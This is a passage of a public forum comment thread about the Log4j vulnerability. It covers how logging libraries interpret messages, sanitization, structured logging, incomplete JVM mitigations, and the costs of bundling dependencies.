by iabervon (subscriber, #722)
[Link] (3 responses)
Posted Dec 17, 2021 23:52 UTC (Fri)
by tialaramex (subscriber, #21167)
[Link] (2 responses)
A month ago, Apache Log4j2's documentation proudly explained that lookups, including recursive lookups were a great feature and that although a mechanism was provide to turn them off, you should think twice before doing so. When 2.15.0 shipped that was gone, and the documentation explained what was true all along, that this is incredibly dangerous and you shouldn't do it, but it was available if you needed it. I assume this was further refined for 2.16.0 If you're wondering what it used to look like, check the Wayback Machine as I did.
Java thinks the variable userName I got from my HTTP endpoint, and the string literal "User {} not found" are the exact same kind of thing, Strings. So even if they told Java developers not to write log(userDefinedValues) they couldn't put any force behind such a requirement. And since the rest of Java lacks format handling, it's pretty usual for Java programmers to write("stuff" + like + " " + this) or, if they're more disciplined, use a StringBuilder to reduce the amount of allocation overhead, both of which ensure that even if you pretend your interface is log(format, param1, param2, param3) it's always used as log(userDefinedValues) anyway because the user smashes everything into a single String before even trying to log it.
As I understand it, in Swift you can say, this parameter must be a string literal, and when the programmer tries to log(userDefinedValues) that doesn't compile because the type doesn't match. In Rust, you can't do that, but they luck out because their formatting is built out of macros, and so the *macro* language needs to parse the format which must happen at compile time, as a result format!(userDefinedValues) won't compile whereas format!("{}", userDefinedValues) does what you want and isn't confused by whatever is in userDefinedValues at runtime.
Posted Dec 18, 2021 7:13 UTC (Sat)
by iabervon (subscriber, #722)
[Link]
It looks like there was a suggested feature of configuring your output layout to include looking things up in a context, and this was also insecure due to the recursive nature of lookups, but that wasn't the default configuration problem that's hitting everything that used log4j2.
Posted Dec 24, 2021 7:34 UTC (Fri)
by spigot (subscriber, #50709)
[Link]
Posted Dec 17, 2021 15:54 UTC (Fri)
by nim-nim (subscriber, #34454)
[Link] (10 responses)
Any semi-useful logging system will do that. The data produced by the logger is minimal (logging is expensive), you need to complete it with something else for it to be useful, you can not defer completing because something else’s state also changes over time, completing requires some parsing of the data being completed.
That was already the case for paper sailor logs, sailors would log all kind of things (such as weather) in addition to their own decisions, and the logs would link all that data (interpret things).
Log4j’s failure is not in interpreting logged data, Log4j’s failure is first in failing to sanitize logged data before interpreting, and second in accepting to use non-vetted external third party code for the interpreting.
Posted Dec 17, 2021 17:16 UTC (Fri)
by MarcB (guest, #101804)
[Link] (6 responses)
Usually a logging system will have the raw message, some additional static information (like severity) and some dynamic information (like timestamp, scope, PID, ...). All of this is inherently trustworthy.
The root cause of this mess is that Log4j went further and actually started interpreting the raw data. If there is any lesson to be learned here, it is "respect complexity".
Posted Dec 18, 2021 17:51 UTC (Sat)
by nim-nim (subscriber, #34454)
[Link] (5 responses)
Pretty much every time some info is replaced by expanded values or compared with some other info source (user name instead of user id, FQDN instead of IP, numeric timestamp with full local time, outcome of processing node A with outcome of processing node B).
The raw local numeric values the logger process captures are not terribly useful as-is.
The only thing that changes is the amount of parsing and reprocessing (see also syslog pipelines, this was not invented yesterday).
Posted Dec 18, 2021 23:10 UTC (Sat)
by gfernandes (subscriber, #119910)
[Link]
Posted Dec 20, 2021 9:32 UTC (Mon)
by MarcB (guest, #101804)
[Link] (3 responses)
But that should never be parsed from the log message. The IP address or user id is already known to the logging application and then mapped via some pre-configured mechanism.
Posted Dec 20, 2021 10:07 UTC (Mon)
by nim-nim (subscriber, #34454)
[Link] (2 responses)
In more complex setups the bit that manipulates some data has no need to understand some of this data, but you still want the logs to expand it, because analysing problems needs more context.
So quite often logged data goes through some processing which the logged bit of code has no need of itself. People may hide this processing in another part of the app, in a third party lib, in plugins or even by invoking third-party executables shell-mode (all of those things may make remote network calls BTW). But this processing exists.
It’s the default history *nix approach BTW, unstructured logging with lots or reprocessing came before structured logs that force the log emitter to put its data into order (more) directly.
Posted Dec 20, 2021 15:04 UTC (Mon)
by MarcB (guest, #101804)
[Link] (1 responses)
And yes, ideally you would create structured logs - precisely to avoid having to parse the raw log message. Parsing unstructured logs is only acceptable if there is no better solution; i.e. when you cannot adjust the logging application. For a library like log4j - which is generating the logs in the first place - it makes no sense whatsoever.
For our in-house applications we have long since switched to a dual logging approach: classic unstructured logs stored locally and structured logs sent to logging infrastructure. The local logs would only be relevant in the (so far hypothetical) scenario of a major infrastructure outage.
Posted Dec 20, 2021 18:14 UTC (Mon)
by nim-nim (subscriber, #34454)
[Link]
The massaging is not an exception and would not exist without choices done logger-side.
Posted Dec 17, 2021 17:23 UTC (Fri)
by smurf (subscriber, #17840)
[Link] (2 responses)
Wrong. It's RANDOM EXTERNAL DATA. There is no freakin' POINT in even TRYING to interpret ANY of it.
Sorry for shouting, but … is this really that hard to comprehend?
(In a sane world we would be 20 years past the obvious "well, obviously yes since log4j stepped into that one" answer …)
Posted Dec 18, 2021 18:19 UTC (Sat)
by nim-nim (subscriber, #34454)
[Link]
A raw unfiltered copy of external data is not a log it’s a capture (that will be interpreted by the capture viewer because raw data is useless as-is).
As with any processing of externally supplied data you need to check how the code that processes this data could be abused and sanitize the external data against it. That’s where log4j failed (in a gross way).
Posted Dec 21, 2021 11:46 UTC (Tue)
by k8to (guest, #15413)
[Link]
From the perspective of a logging system, the text being logged is not something that should be "operated upon". That should be explicitly avoided.
Sanitization is never anywhere near as safe as simply not processing the data computationally at all.
The only thing you usually want to do to "sanitize" data in a logging system is make some decisions about how to handle really unexpected cases, like requests to log giant things like hundreds of kilobytes of data. Most logging systems simply truncate these after any formatting, or try to be clever and avoid unnecessary format building if the result will be unnecessarily large. But this is really just a subset of the "formatting" task, ie, placing various data blobs into the logged item. It is by no means needed in any way to take the data blobs and perform any computational tasks beyond "turn into string.
In a sane logging system, and language "turn into string" is not something that can trigger unexpected call paths.
Posted Dec 18, 2021 20:07 UTC (Sat)
by linuxjacques (subscriber, #45768)
[Link]
it's even on the Ingenuity helicopter on Mars
How credible are the images from Ingenuity now?
Where is Perseverance going?
;)
it's even on the Ingenuity helicopter on Mars
it's even on the Ingenuity helicopter on Mars
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
At that time, thus, there were few vulnerable packages available for free download and use, so every project had to code up its own security bugs. The community rose to the challenge and, even in those more innocent days, security problems were in anything but short supply.
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Also companies: "We will never contribute any code or money to your project"
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Standing on the fragil shoulders of giants
Standing on the fragil shoulders of giants
Standing on the fragil shoulders of giants
Standing on the fragil shoulders of giants
I can't get past this thought. Arguably it *is* that log4j treats logged strings as anything other than dead data to log, but a common pattern involves anonymous functions streaming to StringBuilder inside the logging method. When that's allowable, the community is unwittingly enabling the creation of a culture where you *can* follow this pattern so nobody trains StackOverflow with answers why it's a bad idea to follow that pattern.
Standing on the fragil shoulders of giants
Lessons from Log4j
There is some misinformation running around that newer versions of the JVM "fix" the problem through changing the defaults for com.sun.jndi.cosnaming.object.trustURLCodebase and com.sun.jndi.rmi.object.trustURLCodebase. Those protections are incomplete, depending on the application and its dependencies. For example, the XBean BeanFactory that is bundled with Tomcat is a known attack vector when combined with the Log4j problems, even when you are running on the latest JVMs with the more secure defaults. Ref: https://www.openwall.com/lists/oss-security/2021/12/10/2
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Wol
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Wol
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
(2) Because if you're young (and "foolish") you don't understand the concept.
(3) Because if you haven't been burnt you don't see the point.
And, rather importantly
(4) if you're a manager it's someone else's problem...
Wol
> Bonus points if you can do it without the kneejerk CADT response.
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
> IMHO that doesn't count as "bundling" because, in most cases, at least on modern systems, the thing that is bundled is a binary blob self-extracting installer you got from upstream, and you are in no way allowed to just install random DLLs into your Program Files directory.
Dependency bundling
Dependency bundling
Dependency bundling
> Yeah, and then you have a library linked against FooLib 3.2, another library using FooLib 3.3, and no way to prevent these two from stepping on each others' toes when you try using them in the same application.
Dependency bundling
Dependency bundling
Dependency bundling
> If they get acquired by a large company, the biggest M&A risk is that they will have to do a major refactor or even rewrite in order to fix that mess.
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
> Build your production software on a platform that has support.
Dependency bundling
Dependency bundling
I hope that after these fires have been put out we all sit down and have a serious re-think about the downside of bundling dependencies.
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
Dependency bundling
With Flatpak, after some time, you will have more copies of the library. Because there is apparently no garbage collection of old runtimes:
Dependency bundling
Fedora Platform org.fedoraproject.Platform 34 f34 fedora system
Fedora Platform org.fedoraproject.Platform 35 f35 fedora system
Freedesktop Platf… org.freedesktop.Platform 20.08.15 20.08 flathub system
Freedesktop Platf… org.freedesktop.Platform 21.08.4 21.08 flathub system
Mesa …eedesktop.Platform.GL.default 21.1.7 20.08 flathub system
Mesa …eedesktop.Platform.GL.default 21.2.2 21.08 flathub system
Intel …edesktop.Platform.VAAPI.Intel 20.08 flathub system
Intel …edesktop.Platform.VAAPI.Intel 21.08 flathub system
ffmpeg-full …edesktop.Platform.ffmpeg-full 20.08 flathub system
ffmpeg-full …edesktop.Platform.ffmpeg-full 21.08 flathub system
GNOME Application… org.gnome.Platform 3.38 flathub system
GNOME Application… org.gnome.Platform 40 flathub system
GNOME Application… org.gnome.Platform 41 flathub system
Of course non-used runtimes are not a threat. They occupy disk space only.
Dependency bundling
Dependency bundling
snaps & flatpaks...
My thoughts exactly...
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Check the Wayback Machine
Check the Wayback Machine
Interestingly, in late November JEP draft: Templated Strings and Template Policies (Preview) was updated.
As one of its goals it lists:
Check the Wayback Machine
Hopefully the Log4j 2 incident will provide an impetus for this work.
Lessons from Log4j
Lessons from Log4j
None of this even requires looking at the raw message. All a sane log system will do, is enforcing some limits on it (size, output encoding, ...).
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
Lessons from Log4j
random comment